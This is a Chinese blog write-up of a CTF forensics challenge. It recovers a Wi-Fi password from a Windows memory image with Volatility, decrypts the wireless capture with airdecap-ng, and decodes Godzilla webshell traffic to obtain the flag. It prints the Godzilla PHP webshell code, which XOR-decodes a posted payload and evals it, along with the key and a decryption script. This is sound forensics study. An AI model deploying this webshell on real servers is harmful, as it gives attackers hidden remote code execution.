陇剑杯-Misc-wifi

已于 2022-02-07 19:17:14 修改
阅读量459 收藏
点赞数 2
分类专栏: Misc 文章标签: 安全 web安全
于 2021-09-23 18:44:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47168481/article/details/120431142
版权

题目:
在这里插入图片描述

首先下载可以得到三个文件,
一个镜像,两个流量包(客户端和服务器端)

先看下客户端的流量:
在这里插入图片描述流量被加密了,后面肯定需要通过某种方式解密
可以从中提取一些信息:

SSID(路由器发送的无线信号的名字)=My_Wifi和HuaweiDe_4c:55:ec

aircrack-ng主要用于wifi流量包密码的恢复,需要提供一份字典

airdecap-ng 用于解开正在加密的流量包 ,需要知道ssid和pass,这里猜测应该是用这个。

继续看服务端的包:
知道是上传了木马,那么肯定是通过post方式,查找post的包
在这里插入图片描述在这里发现一段加密数据的信息,按照其提示进行重放:
在这里插入图片描述

@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='key';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (stripos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

拿去搜索一下发现这是个哥斯拉shell工具的加密流量在这里插入图片描述对哥斯拉加密流量的描述

里面可以知道的有:

服务器响应数据左右附加的混淆字符串(对于PHP_XOR_BASE64加密方式来说,前后各附加了16位的混淆字符),然后将得到的数据进行base64解码,最后再和shell连接密钥md5值的前16位按位异或,即完成响应数据的解密。

获取到服务器响应报文后,最多进行一次gzip解压。

即要想解密服务器响应数据,需要去除混淆字符,进行base64解密,再异或,再进行gzip解密。

欧克现在去看看看镜像里面有什么内容(目的是破解客户端的流量)

前面知道破解流量包需要ssid和密码,知道ssid=My_Wifi,那就去找一下

vol.py -f Windows\ 7-dde00fa9.vmem imageinfo 

vol.py -f Windows\ 7-dde00fa9.vmem --profile=Win7SP1x86_23418 filescan | grep "My_Wifi"

vol.py -f Windows\ 7-dde00fa9.vmem --profile=Win7SP1x86_23418 dumpfiles -Q 0x000000003fdc38c8 --dump-dir=./

vol.py -f Windows\ 7-dde00fa9.vmem --profile=Win7SP1x86_23418 filescan | grep "Interfaces"

在这里插入图片描述找到一个压缩文件,需要密码,将压缩文件拿到win环境中查看
在这里插入图片描述密码在网络适配器(网卡)中

win7系统,关于系统保存的wifi密码文件地址:如果是Windows Vista或Windows 7,保存在c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces[网卡Guid]

搜索Interfaces查看:
在这里插入图片描述知道GUID:{529B7D2A-05D1-4F21-A001-8F4FF817FC3A}

  • 打开加密文件:
    在这里插入图片描述欧克似乎已经找到了密码:233@114514_qwe

使用airdecap-ng破解:
在这里插入图片描述
得到解密后的客户端流量包:在这里插入图片描述那么flag在哪呢?
已知小王往 upload-labs 上传木马后进行了 cat /flag,小王在根目录下读取了flag,那么这个flag应该在发出请求后哥斯拉响应的数据中。

在上面查看资料后可以知道相关的解密方法,利用前面获取的脚本模仿写下解密脚本:

<?php
function encode($D,$K){
	for($i=0;$i<strlen($D);$i++){
		$c = $K[$i+1&15];
		$D[$i] = $D[$i]^$c;
	}
	return $D;
}
 
$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
echo gzdecode(encode(base64_decode('需要解密的内容'),$key));
?>
  • 现在是需要在客户端获取服务器响应的数据:
    同样是http协议,过滤下,多跟踪几个数据,进行解密。
    尝试解密了几个都发现不是flag,使用这个http流,最终成功复现出flag
    在这里插入图片描述最后得到flag(其中gzdecode函数是在php 5.4之后才有用):

flag{5db5b7b0bb74babb66e1522f3a6b1b12}

在这里插入图片描述
收获:

  • airdecap-ng的使用方法
  • 哥斯拉shell管理工具加密传输流量的初步了解
  • 思维导图在这里插入图片描述
YnG_t0
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
陇剑杯学习流量分析
weixin_44687621的博客
09-18 677
JWT 使用wireshark打开附件,追踪HTTP流。 分析这个JWT字段,到jwt.io下面去解出来 追踪TCP流,到第10个TCP时,我们可以发现这里实现了命令执行,输出了当前服务器的权限。 获得命令执行接口后,上传了一个c文件到tmp目录下。 上传该c文件后,使用makefile操作将这个c文件编译成恶意的so文件。 CFLAGS += -Werror -Wall looter.so: looter.c gcc $(CFLAGS) -fPIC -shared -Xlinker -x -o
2024陇剑杯答题笔记(更新中),2024年最新真香系列
2401_83974064的博客
04-13 736
在.idea中检查到如下两个文件,推测为挖矿软件。 题目: 打开mine_doge.sh可以看到内容如下 可以在POOL中找到矿池地址为 doge.millpools.cc:5567题目: 如上题,可在mine_doge.sh中找到钱包地址为 DRXz1q6ys8Ao2KnPbtb7jQhPjDSqtwmNN9.lolMinerWorker题目: 经过排序后可以看到只有两个ip在通信,所以可以推测ip为192.168.246.28 题目: 观察到这是一个telnet通信,于是追踪数据包 可以看到口令为 yo
首届“陇剑杯”网络安全大赛_wifi
weixin_72667582的博客
08-06 659
原题如下:网管小王最近喜欢上了ctf网络安全竞赛,他使用“哥斯拉”木引进玩玩upload-labs ,并且保存了内存镜像、 wifi和服务器流量,让您来分析后作答:(本题仅1小问) 小王往upload-labs上传木马后进行了cat /flag,flag内容为__。
首届“陇剑杯”网络安全大赛wp-WIFI部分(详细题解)
偷一个月亮
09-16 1716
首届“陇剑杯”网络安全大赛wp(wifi) author:Neg00 题目介绍: 网管小王最近喜欢上了ctf网络安全竞赛,他使用“哥斯拉”木马来玩玩upload-labs,并且保存了内存镜像、wifi流量和服务器流量,让您来分析后作答:(本题仅1小问) 附件下载 https://share.weiyun.com/0kEM1pm5 下载文件解压得到三个文件 镜像分析 发现一个压缩包文件,提取出来分析 题目出现提示,密码是网卡的GUID password is Network Adapter G
陇剑杯2021(一)
wha1e的博客
06-27 1735
陇剑杯2021(一)
陇剑杯----自己分析的
FogIslandBay的博客
09-17 1204
交流群:694364064 流量分析 分析数据包hack.pcap,黑客登录系统使用的密码是________。 分析数据包hack.pacap,黑客修改了一个文件日志,文件的绝对路径为________。 分析数据包hack.pcap,黑客获取webshell之后,权限是_________? 分析数据包hack.pcap,黑客写入的webshell文件名是_________。(请提交带有文件后缀的文件名,例如x.txt) 分析数据包hack.pcap,黑客上传的代理工具客户端名字是________
安恒杯-misc-附件资源
03-05
安恒杯-misc-附件资源
CTF-MISC关于各类编码习题(湖工商扛把子)
03-17
在“CTF-MISC关于各类编码习题(湖工商扛把子)”这个主题中,你可以通过实践和解决1-1等文件中的题目,进一步提升自己在编码解码方面的技能。了解和熟练掌握这些编码方式对于CTF比赛中的Misc任务至关重要,能够帮助...
2023羊城杯 DASCTF EZ-Misc
09-03
2023羊城杯 DASCTF EZ-Misc
PowerShell-Misc:其他PowerShell
04-08
"PowerShell-Misc:其他PowerShell"这个主题涵盖了一系列非标准或特定用途的PowerShell示例,这些示例可能不常见但非常实用。以下是对这些示例中可能涉及的知识点的详细解释: 1. **PowerShell基础**:了解...
2021陇剑杯
qq_48511129的博客
12-13 478
过滤http,发现大量http数据包 只发现少量dns流量包和没有发现ftp流量包 所以判断出是http协议攻击 2.1 直接过滤HTTP包,右键选择“追踪流”进入tcp流 将token进行jwt解码,出现jwt字段,所以判断出是jwt认证 2.2 过滤http,追踪tcp流,将token内容直接拿去base64解码 得到 {“alg”:“HS256”,“typ”:“JWT”}.{“id”:10086,“MapClaims”:{“aud”:“admin”,“username”:"admin"fX0.t
陇剑杯总结
m0_55185160的博客
09-20 1223
对于陇剑杯这次比赛,我觉得比赛形式比较有创新,考核的内容更容易上手,多以日志的形式考核,包括SQL注入,我可以做的题目就是日志分析题和SQL注入题,这次比赛的流量分析太难了,没有了tcp/ip协议而是udp协议 无法入手,还有关于取证领域的还没学习涉及到,所以没有做。还有一个只是点不会的,就是在日志中得知SQL注入的payload,把数据库里的flag导出来。 ...
陇剑杯部分wp(参赛总结与反思)
cuddlylm的博客
10-17 583
1.签到 网管小王在上网途中发现自己的网络访问异常缓慢,于是对网络出口捕获了流量,请您分析流量后进行回答:(本题仅1小问) 此时正在进行的可能是___http___协议的网络攻击。(如有字母请全部使用小写,填写样例:http、dns、ftp) 看请求包,协议为http,版本为1.1 2.jwt 昨天,单位流量系统捕获了黑客攻击流量,请您分析流量后进行回答: 这题要先了解什么是jwt JSON Web Token (JWT)是一个开放标准(RFC 7519),它定义了一种紧凑的、自包含的方式,用于作为JS
2024陇剑杯答题笔记(更新中),2024年最新网络安全插件化+模块化+组件化+热修复
2401_84150557的博客
04-09 957
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
[2021首届“陇剑杯”网络安全大赛 决赛]内存取证writeup
ShenZ的博客
11-24 4937
内存取证 附件:mem_sec.vmem 1.一日运维人员针对被入侵主机进行了一次内存分析,请根据内存镜像进行分析并回答下述问题。请根据u盘里的mem_sec.zip文件进行分析。取证人员首先对主机信息进行核实,该内存主机的产品密钥是__K3KHX-TCQKF-WGFXC-7T3BJ-9TPJC__。(答案格式字符全部大写) 2.经过入侵分析发现该主机的使用人员曾经访问过匿名邮箱的网址是__________。(答案包含http://或者https://,答案最后没有/) 1https://mail.td?
2021陇剑杯网络安全大赛-iOS
热门推荐
qq_43264813的博客
09-14 1万+
2021陇剑杯网络安全大赛-iOS 题目描述: 一位ios的安全研究员在家中使用手机联网被黑,不仅被窃密还丢失比特币若干,请你通过流量和日志分析后作答: 解题思路: 10.1黑客所控制的C&C服务器IP是__3.128.156.159__。 查看具体的tcp流,可以发现这⾥有转发操作 10.2黑客利用的Github开源项目的名字是_stowaway_。(如有字母请全部使用小写) 上⼀小题的流,wget⼀个github包 10.3通讯加密密钥的明文是__hack4sec__。 同上数据流,转
2021年“陇剑杯“部分WP
mwmbfh的博客
09-15 1897
2021年"陇剑杯"部分WP一、 战队信息二、 解题情况三、 解题过程题目3.1题目3.1操作内容题目3.1flag值题目7.1题目7.1操作内容题目7.1flag值题目8.1题目8.1操作内容题目8.1flag值题目8.2题目8.2操作内容题目8.2flag值题目8.3题目8.3操作内容题目8.2flag值 一、 战队信息 战队名称:fuller 二、 解题情况 三、 解题过程 题目3.1 题目3.1操作内容 使用wireshark打开题目文件,使用筛选条件,选择发送的数据。 Ø
2024陇剑杯答题笔记(更新中),2024年最新网络安全权限处理
最新发布
2401_83946044的博客
04-15 819
检查Nginx日志(/var/log/nginx/access.log)中查看访问信息,可以在最后找到ua信息为Mozilla/5.0 (compatible;可能是开机自启,所以检查/root/lib/systemd/system/和/etc/systemd/system/,在/root/lib/systemd/system/中找到了redis.service文件。值得注意的是%27为。所以答案为/lib/systemd/system/redis.service,转换格式为。所以真正的后门文件为。
kbd-misc-2.5.1
09-13
### 回答1: kbd-misc-2.5.1是一个Linux操作系统下的键盘输入处理工具包,它包含了一些常用的工具和驱动程序,如loadkeys、dumpkeys、kbd_mode等。这些工具可以帮助用户配置和管理Linux系统下的键盘输入设备,包括设置键盘映射、键盘布局、键盘模式等。同时,kbd-misc-2.5.1还提供了一些驱动程序,如atkbd、ps2mouse等,用于支持各种类型的键盘和鼠标设备。kbd-misc-2.5.1是一个开源项目,它的源代码可以在GitHub上免费获取和更新,支持多种Linux发行版和硬件平台。 ### 回答2: kbd-misc-2.5.1 是一个开源软件包,其中包含了一些与键盘和输入设备有关的工具和驱动程序。这个软件包是在Linux内核中使用的,并提供了一些用于处理和管理键盘和输入设备的功能。 kbd-misc-2.5.1 软件包中的一些主要功能包括: 1. 键盘驱动程序:这个软件包提供了一些用于驱动各种类型的键盘的驱动程序。这些驱动程序允许操作系统与键盘进行通信,接收来自键盘的输入,并将其发送给应用程序。 2. 控制台工具:kbd-misc-2.5.1 还包含了一些用于控制台显示的工具。这些工具可以配置控制台的字体、颜色和布局等属性,提供了一些命令行工具来管理控制台的显示内容。 3. 输入法支持:该软件包还提供了对输入法的支持。它包含了一些输入法引擎和库文件,可以将输入法的功能集成到系统中,并提供输入法切换和输入法配置等功能。 4. 键盘映射:kbd-misc-2.5.1 还提供了一些工具和配置文件,用于定义键盘的映射规则。这允许用户自定义键盘的按键功能,以满足个人偏好或特定需求。 总之,kbd-misc-2.5.1 是一个用于处理和管理键盘和输入设备的开源软件包。它提供了一些驱动程序、工具和配置文件,允许用户自定义键盘和控制台的设置,并提供输入法支持和键盘映射功能。 ### 回答3: kbd-misc-2.5.1 是一个用于 Linux 操作系统的桌面键盘和控制台控制工具集。 kbd-misc-2.5.1 提供了一系列实用程序和工具,用于访问和管理 Linux 系统中的键盘和控制台。其中包括一些用于控制键盘布局和映射的工具,以及一些用于处理键盘输入的实用程序。这些工具可以帮助用户在 Linux 系统中调整和定制键盘的功能和行为。 kbd-misc-2.5.1 还包含一些用于控制台中显示的字符和图形的程序。这些程序可以提供更丰富的字符和图形显示效果,使控制台界面更加美观和易于使用。 该工具集还提供了一些用于处理输入事件和生成键盘事件的库和驱动程序。这些库和驱动程序可以与操作系统内核进行交互,以实现键盘输入的捕获和处理。 总的来说,kbd-misc-2.5.1 是一个功能丰富的工具集,用于在 Linux 系统中控制和定制键盘和控制台的功能和行为。它提供了一些实用程序、工具、库和驱动程序,帮助用户充分利用键盘和控制台的功能,提高系统的易用性和个性化定制能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

YnG_t0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值